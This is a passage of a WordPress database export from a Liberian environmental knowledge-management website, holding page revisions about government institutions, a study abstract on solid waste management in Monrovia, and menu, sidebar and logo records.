[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mpw\" page_length=\"false\"]','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2019-11-20 23:53:14','2019-11-20 23:53:14','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(2646,1,'2019-11-20 23:54:33','2019-11-20 23:54:33','<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.</p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.</p>','Central Agricultural Research Institute','','inherit','closed','closed','','1592-revision-v1','','','2019-11-20 23:54:33','2019-11-20 23:54:33','',1592,'https://ekmsliberia.info/1592-revision-v1/',0,'revision','',0),(2647,1,'2019-11-20 23:55:24','2019-11-20 23:55:24','<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.</p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.</p>		\n			<h2>Featured Projects</h2>		\n										<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img width=\"1024\" height=\"530\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" title=\"Enhancing Resilience of Vulnerable Coastal Areas\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Central Agricultural Research Institute','','inherit','closed','closed','','1592-revision-v1','','','2019-11-20 23:55:24','2019-11-20 23:55:24','',1592,'https://ekmsliberia.info/1592-revision-v1/',0,'revision','',0),(2648,1,'2019-11-20 23:56:50','2019-11-20 23:56:50','<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.</p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Central Agricultural Research Institute','','inherit','closed','closed','','1592-revision-v1','','','2019-11-20 23:56:50','2019-11-20 23:56:50','',1592,'https://ekmsliberia.info/1592-revision-v1/',0,'revision','',0),(2649,1,'2019-11-20 23:57:22','2019-11-20 23:57:22','<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.</p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:cari\" page_length=\"false\"]','Central Agricultural Research Institute','','inherit','closed','closed','','1592-revision-v1','','','2019-11-20 23:57:22','2019-11-20 23:57:22','',1592,'https://ekmsliberia.info/1592-revision-v1/',0,'revision','',0),(2650,1,'2019-11-21 00:00:53','2019-11-21 00:00:53','National Legislature on Natural Resources Committee coming soon!','National Legislature on Natural Resource Committee','','inherit','closed','closed','','1590-revision-v1','','','2019-11-21 00:00:53','2019-11-21 00:00:53','',1590,'https://ekmsliberia.info/1590-revision-v1/',0,'revision','',0),(2651,1,'2019-11-21 00:01:21','2019-11-21 00:01:21','National Legislature on Natural Resources Committee coming soon!		\n			<h2>Featured Projects</h2>		\n										<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img width=\"1024\" height=\"530\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" title=\"Enhancing Resilience of Vulnerable Coastal Areas\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','National Legislature on Natural Resource Committee','','inherit','closed','closed','','1590-revision-v1','','','2019-11-21 00:01:21','2019-11-21 00:01:21','',1590,'https://ekmsliberia.info/1590-revision-v1/',0,'revision','',0),(2652,1,'2019-11-21 00:02:42','2019-11-21 00:02:42','National Legislature on Natural Resources Committee coming soon!		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:national-legislature\" page_length=\"false\"]','National Legislature on Natural Resource Committee','','inherit','closed','closed','','1590-revision-v1','','','2019-11-21 00:02:42','2019-11-21 00:02:42','',1590,'https://ekmsliberia.info/1590-revision-v1/',0,'revision','',0),(2653,1,'2019-11-21 00:03:56','2019-11-21 00:03:56','<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.</p>\n<p>The overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.</p>		\n			<h2>Featured Projects</h2>		\n										<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img width=\"1024\" height=\"530\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" title=\"Enhancing Resilience of Vulnerable Coastal Areas\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:nafaa\" page_length=\"false\"]','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-21 00:03:56','2019-11-21 00:03:56','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(2654,1,'2019-11-21 00:04:42','2019-11-21 00:04:42','<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.</p>\n<p>The overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:nafaa\" page_length=\"false\"]','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-21 00:04:42','2019-11-21 00:04:42','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(2655,1,'2019-11-21 00:05:22','2019-11-21 00:05:22','The MODCSP information coming soon!		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Gender, Children and Social Protection','','inherit','closed','closed','','1584-revision-v1','','','2019-11-21 00:05:22','2019-11-21 00:05:22','',1584,'https://ekmsliberia.info/1584-revision-v1/',0,'revision','',0),(2656,1,'2019-11-21 00:07:49','2019-11-21 00:07:49','The MODCSP information coming soon!		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mogcsp\" page_length=\"false\"]','Ministry of Gender, Children and Social Protection','','inherit','closed','closed','','1584-revision-v1','','','2019-11-21 00:07:49','2019-11-21 00:07:49','',1584,'https://ekmsliberia.info/1584-revision-v1/',0,'revision','',0),(2658,1,'2019-11-22 23:45:54','2019-11-22 23:45:54','The population of Monrovia is increasing accompanied by rapid urbanization. Due to rapid urbanization, economic development, higher living standards and changes in consumption patterns and lifestyle, the generation rate of waste has increased. Mismanagement of solid waste tends to hinder any progress towards environmental sustainability. This study endeavored to determine the adequacy of waste management services in the city, explore the linkage between population and development and the increase in the generation of wastes.\r\n\r\nThe study assessed both qualitatively and quantitatively behavioral factors including knowledge, attitude and practices of solid waste management, collaboration among stakeholders, and challenges related to sustainable waste management in Monrovia. Households were selected randomly (simple and stratified) to show the socio-economic groups in the city. Purposive sampling was used to identify key informants or personnel in charge of waste management and the use of questionnaires captured vital information on waste management in the city.\r\n\r\nThe major findings showed the main proportion of waste generated in Monrovia was organic refuse (40.2%) followed by plastic (14.2%). Waste generated are inadequately disposed of due to the inadequate collection system, as large fragment of waste remain uncollected resulting in open dumping and burning of wastes. These waste management challenges have become heightened as a result of insufficient technology to ensure proper management, low budgetary allocations for effective waste management, lack of skilled professionals, poor implementation of\r\nregulations to ensure adequate management, and poor public awareness.','Solid Waste Management in Monrovia','','publish','closed','closed','','solid-waste-management-in-monrovia','','','2022-12-06 11:10:20','2022-12-06 11:10:20','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2658',115,'document','',0),(2659,1,'2019-11-22 23:40:50','2019-11-22 23:40:50','','Monrovia waste Management','','inherit','open','closed','','monrovia-waste-management','','','2019-11-22 23:40:50','2019-11-22 23:40:50','',2658,'https://ekmsliberia.info/wp-content/uploads/2019/11/Monrovia-waste-Management.pdf',0,'attachment','application/pdf',0),(2660,1,'2019-11-22 23:48:16','2019-11-22 23:48:16','The population of Monrovia is increasing accompanied by rapid urbanization. Due to rapid urbanization, economic development, higher living standards and changes in consumption patterns and lifestyle, the generation rate of waste has increased. Mismanagement of solid waste tends to hinder any progress towards environmental sustainability. This study endeavored to determine the adequacy of waste management services in the city, explore the linkage between population and development and the increase in the generation of wastes.\n\nThe study assessed both qualitatively and quantitatively behavioral factors including knowledge, attitude and practices of solid waste management, collaboration among stakeholders, and challenges related to sustainable waste management in Monrovia. Households were selected randomly (simple and stratified) to show the socio-economic groups in the city. Purposive sampling was used to identify key informants or personnel in charge of waste management and the use of\nquestionnaires captured vital information on waste management in the city.\n\nThe major findings showed the main proportion of waste generated in Monrovia was organic refuse (40.2%) followed by plastic (14.2%). Waste generated are inadequately disposed of due to the inadequate collection system, as large fragment of waste remain uncollected resulting in open dumping and burning of wastes. These waste management challenges have become heightened as a result of insufficient technology to ensure proper management, low budgetary allocations for effective waste management, lack of skilled professionals, poor implementation of\nregulations to ensure adequate management, and poor public awareness.','Solid Waste Management in Monrovia','','inherit','closed','closed','','2658-autosave-v1','','','2019-11-22 23:48:16','2019-11-22 23:48:16','',2658,'https://ekmsliberia.info/2658-autosave-v1/',0,'revision','',0),(2661,1,'2019-11-22 23:53:16','2019-11-22 23:53:16','','featured_cbd_0','A Black Beetle. Photo Credit: Dr. Kolleh Bangura','inherit','open','closed','','featured_cbd_0','','','2019-11-22 23:55:44','2019-11-22 23:55:44','',473,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd_0.jpg',0,'attachment','image/jpeg',0),(2662,1,'2019-11-23 14:14:53','2019-11-23 14:14:53','<h2>The EKMS Community Forum</h2>		\n		Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.\nFeel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Request to Join Us!</a>\n<strong>Added Tools to the Community:</strong>\nMembers Chat (Activated)\nGroup Chatting (Activated)\nGroup online meetings hosting or Video Conferencing (In Progress)\nEvents Setup (Activated)','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-23 14:14:53','2019-11-23 14:14:53','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2663,1,'2019-11-23 14:16:01','2019-11-23 14:16:01','<h2>The EKMS Community Forum</h2>		\n		<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.</p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.</p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.</p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Request to Join Us!</a></p><p><strong>Added Tools to the Community:</strong></p><p>Members Chat (Activated)</p><p>Group Chatting (Activated)</p><p>Group online meetings hosting or Video Conferencing (In Progress)</p><p>Events Setup (Activated)</p>','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-23 14:16:01','2019-11-23 14:16:01','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2664,1,'2019-11-23 14:37:32','2019-11-23 14:37:32','','LAA Sidebar','','publish','closed','closed','','laa-sidebar','','','2019-11-23 14:37:32','2019-11-23 14:37:32','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2664',0,'sidebar','',0),(2665,1,'2019-11-23 14:37:08','2019-11-23 14:37:08','','','','publish','closed','closed','','2665','','','2019-11-23 14:37:23','2019-11-23 14:37:23','',2664,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2665',1,'condition_group','',0),(2667,1,'2019-11-23 14:42:21','2019-11-23 14:42:21','','lla_logo','','inherit','open','closed','','lla_logo','','','2021-08-17 20:40:56','2021-08-17 20:40:56','',1602,'https://ekmsliberia.info/wp-content/uploads/2019/11/lla_logo.png',0,'attachment','image/png',0),(2668,1,'2019-11-23 14:46:43','2019-11-23 14:46:43','','MIA Official Site','','publish','closed','closed','','mia-official-site','','','2019-11-23 14:46:43','2019-11-23 14:46:43','',0,'https://ekmsliberia.info/?p=2668',1,'nav_menu_item','',0),(2669,1,'2019-11-23 14:46:43','2019-11-23 14:46:43','','Directory of Localities','','publish','closed','closed','','directory-of-localities','','','2019-11-23 14:46:43','2019-11-23 14:46:43','',0,'https://ekmsliberia.info/?p=2669',2,'nav_menu_item','',0),(2670,1,'2019-11-23 14:47:33','2019-11-23 14:47:33','','MIA Sidebar','','publish','closed','closed','','mia-sidebar','','','2019-11-23 14:47:33','2019-11-23 14:47:33','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2670',0,'sidebar','',0),(2671,1,'2019-11-23 14:47:19','2019-11-23 14:47:19','','','','publish','closed','closed','','2671','','','2019-11-23 14:47:28','2019-11-23 14:47:28','',2670,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2671',1,'condition_group','',0),(2672,1,'2019-11-23 14:48:53','2019-11-23 14:48:53','','mia_logo','','inherit','open','closed','','mia_logo','','','2021-08-17 22:23:02','2021-08-17 22:23:02','',1610,'https://ekmsliberia.info/wp-content/uploads/2019/11/mia_logo.png',0,'attachment','image/png',0),(2673,1,'2019-11-23 14:52:00','2019-11-23 14:52:00','','LiMA Sidebar','','publish','closed','closed','','lima-sidebar','','','2019-11-23 14:52:00','2019-11-23 14:52:00','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2673',0,'sidebar','',0),(2674,1,'2019-11-23 14:51:45','2019-11-23 14:51:45','','','','publish','closed','closed','','2674','','','2019-11-23 14:51:55','2019-11-23 14:51:55','',2673,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2674',1,'condition_group','',0),(2675,1,'2019-11-23 14:54:43','2019-11-23 14:54:43','','LiMA Official Site','','publish','closed','closed','','lima-official-site','','','2019-11-23 14:54:43','2019-11-23 14:54:43','',0,'https://ekmsliberia.info/?p=2675',1,'nav_menu_item','',0),(2676,1,'2019-11-23 14:54:43','2019-11-23 14:54:43','','Vessels Database','','publish','closed','closed','','vessels-database','','','2019-11-23 14:54:43','2019-11-23 14:54:43','',0,'https://ekmsliberia.info/?p=2676',2,'nav_menu_item','',0),(2677,1,'2019-11-23 14:56:54','2019-11-23 14:56:54','','lma_logo','','inherit','open','closed','','lma_logo','','','2021-08-17 22:25:27','2021-08-17 22:25:27','',1606,'https://ekmsliberia.info/wp-content/uploads/2019/11/lma_logo.png',0,'attachment','image/png',0),(2678,1,'2019-11-23 14:59:22','2019-11-23 14:59:22','','Concession Sidebar','','publish','closed','closed','','concession-sidebar','','','2019-11-23 14:59:22','2019-11-23 14:59:22','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2678',0,'sidebar','',0),(2679,1,'2019-11-23 14:59:05','2019-11-23 14:59:05','','','','publish','closed','closed','','2679','','','2019-11-23 14:59:13','2019-11-23 14:59:13','',2678,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2679',1,'condition_group','',0),(2680,1,'2019-11-23 15:01:30','2019-11-23 15:01:30','','NBC Official Site','','publish','closed','closed','','nbc-official-site','','','2019-11-23 15:01:30','2019-11-23 15:01:30','',0,'https://ekmsliberia.info/?p=2680',1,'nav_menu_item','',0),(2681,1,'2019-11-23 15:04:02','2019-11-23 15:04:02','','MOT Sidebar','','publish','closed','closed','','mot-sidebar','','','2019-11-23 15:04:14','2019-11-23 15:04:14','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2681',0,'sidebar','',0),(2682,1,'2019-11-23 15:03:45','2019-11-23 15:03:45','','','','publish','closed','closed','','2682','','','2019-11-23 15:03:55','2019-11-23 15:03:55','',2681,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2682',1,'condition_group','',0),(2683,1,'2019-11-23 15:06:15','2019-11-23 15:06:15','','mot_logo','','inherit','open','closed','','mot_logo','','','2021-08-17 23:32:10','2021-08-17 23:32:10','',1598,'https://ekmsliberia.info/wp-content/uploads/2019/11/mot_logo.png',0,'attachment','image/png',0),(2684,1,'2019-11-23 15:13:25','2019-11-23 15:13:25','','MOT Official Site','','publish','closed','closed','','mot-official-site','','','2019-11-23 15:14:48','2019-11-23 15:14:48','',0,'https://ekmsliberia.info/?p=2684',1,'nav_menu_item','',0),(2685,1,'2019-11-23 15:18:29','2019-11-23 15:18:29','<p>Liberia Airport Authority Information coming up</p>		\n			<h2>Related Documents</h2>','Liberia Airport Authority','','inherit','closed','closed','','1596-revision-v1','','','2019-11-23 15:18:29','2019-11-23 15:18:29','',1596,'https://ekmsliberia.info/1596-revision-v1/',0,'revision','',0),(2686,1,'2019-11-23 15:18:36','2019-11-23 15:18:36','<p>Liberia Airport Authority Information coming up</p>','Liberia Airport Authority','','inherit','closed','closed','','1596-revision-v1','','','2019-11-23 15:18:36','2019-11-23 15:18:36','',1596,'https://ekmsliberia.info/1596-revision-v1/',0,'revision','',0),(2687,1,'2019-11-23 15:19:21','2019-11-23 15:19:21','<p>Liberia Airport Authority Information coming up</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ci\" page_length=\"false\"]','Liberia Airport Authority','','inherit','closed','closed','','1596-revision-v1','','','2019-11-23 15:19:21','2019-11-23 15:19:21','',1596,'https://ekmsliberia.info/1596-revision-v1/',0,'revision','',0),(2688,1,'2019-11-23 15:20:37','2019-11-23 15:20:37','','LAA Official Site','','publish','closed','closed','','laa-official-site','','','2019-11-23 15:28:14','2019-11-23 15:28:14','',0,'https://ekmsliberia.info/?p=2688',1,'nav_menu_item','',0),(2689,1,'2019-11-23 15:23:27','2019-11-23 15:23:27','<p>Liberia Airport Authority Information coming up</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:laa\" page_length=\"false\"]','Liberia Airport Authority','','inherit','closed','closed','','1596-revision-v1','','','2019-11-23 15:23:27','2019-11-23 15:23:27','',1596,'https://ekmsliberia.info/1596-revision-v1/',0,'revision','',0),(2690,1,'2019-11-23 15:27:56','2019-11-23 15:27:56','','CARI Official Site','','publish','closed','closed','','cari-official-site','','','2019-11-23 15:27:56','2019-11-23 15:27:56','',0,'https://ekmsliberia.info/?p=2690',1,'nav_menu_item','',0),(2691,1,'2019-11-23 15:29:12','2019-11-23 15:29:12','','CARI Sidebar','','publish','closed','closed','','cari-sidebar','','','2019-11-23 15:29:12','2019-11-23 15:29:12','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2691',0,'sidebar','',0),(2692,1,'2019-11-23 15:28:59','2019-11-23 15:28:59','','','','publish','closed','closed','','2692','','','2019-11-23 15:29:08','2019-11-23 15:29:08','',2691,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2692',1,'condition_group','',0),(2693,1,'2019-11-23 15:30:54','2019-11-23 15:30:54','','cari_logo','','inherit','open','closed','','cari_logo','','','2022-09-14 14:08:29','2022-09-14 14:08:29','',1592,'https://ekmsliberia.info/wp-content/uploads/2019/11/cari_logo.png',0,'attachment','image/png',0),(2694,1,'2019-11-23 15:36:51','2019-11-23 15:36:51','','National Legislature Sidebar','','publish','closed','closed','','national-legislature-sidebar','','','2019-11-23 15:37:15','2019-11-23 15:37:15','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2694',0,'sidebar','',0),(2695,1,'2019-11-23 15:35:50','2019-11-23 15:35:50','','Committee\'s Official Site','','publish','closed','closed','','committees-official-site','','','2019-11-23 15:35:50','2019-11-23 15:35:50','',0,'https://ekmsliberia.info/?p=2695',1,'nav_menu_item','',0),(2696,1,'2019-11-23 15:36:31','2019-11-23 15:36:31','','','','publish','closed','closed','','2696','','','2019-11-23 15:36:42','2019-11-23 15:36:42','',2694,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2696',1,'condition_group','',0),(2697,1,'2019-11-23 15:40:14','2019-11-23 15:40:14','','nfaa_logo','','inherit','open','closed','','nfaa_logo','','','2019-11-23 15:40:14','2019-11-23 15:40:14','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/nfaa_logo.png',0,'attachment','image/png',0),(2698,1,'2019-11-23 15:44:22','2019-11-23 15:44:22','','MGCSP Official Site','','publish','closed','closed','','mgcsp-official-site','','','2019-11-23 15:44:22','2019-11-23 15:44:22','',0,'https://ekmsliberia.info/?p=2698',1,'nav_menu_item','',0),(2699,1,'2019-11-23 15:46:54','2019-11-23 15:46:54','','MGCSP Sidebar','','publish','closed','closed','','mgcsp-sidebar','','','2019-11-23 15:46:54','2019-11-23 15:46:54','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2699',0,'sidebar','',0),(2700,1,'2019-11-23 15:46:42','2019-11-23 15:46:42','','','','publish','closed','closed','','2700','','','2019-11-23 15:46:51','2019-11-23 15:46:51','',2699,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2700',1,'condition_group','',0),(2701,1,'2019-11-23 15:47:53','2019-11-23 15:47:53','','mogcsp_logo','','inherit','open','closed','','mogcsp_logo','','','2019-11-23 15:47:53','2019-11-23 15:47:53','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/mogcsp_logo.png',0,'attachment','image/png',0),(2702,1,'2022-03-10 11:08:21','2019-11-23 15:50:10','','Infrastructure Implementation Unit','','publish','closed','closed','','infrastructure-implementation-unit-2','','','2022-03-10 11:08:21','2022-03-10 11:08:21','',0,'https://ekmsliberia.info/?p=2702',7,'nav_menu_item','',0),(2703,1,'2019-11-23 15:55:46','2019-11-23 15:55:46','','MFDP Official Site','','publish','closed','closed','','mfdp-official-site','','','2019-11-23 15:55:46','2019-11-23 15:55:46','',0,'https://ekmsliberia.info/?p=2703',1,'nav_menu_item','',0),(2704,1,'2019-11-23 15:57:01','2019-11-23 15:57:01','The Ministry of Finance and Development Planning, or MFDP for short, was created in 2013 by an Act of the National Legislature, in line with international financial management best practices. The new MFDP effectively replaces the Ministry of Finance and the Ministry of Planning and Economic Affairs, with the mandate to formulate, institutionalize and administer economic development, fiscal and tax policies for the promotion of sound and efficient management of financial resources of the government.\r\n\r\nAs custodian of the country’s economy, the MFDP combines public finance, development planning and economic management expertise and experience to effectively manage the economy.','Ministry of Finance and Development Planning','','publish','closed','closed','','ministry-of-finance-and-development-planning','','','2022-09-14 14:30:22','2022-09-14 14:30:22','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=2704',31,'institution','',0),(2705,1,'2019-11-23 15:57:01','2019-11-23 15:57:01','The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.\r\n\r\nThe EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical 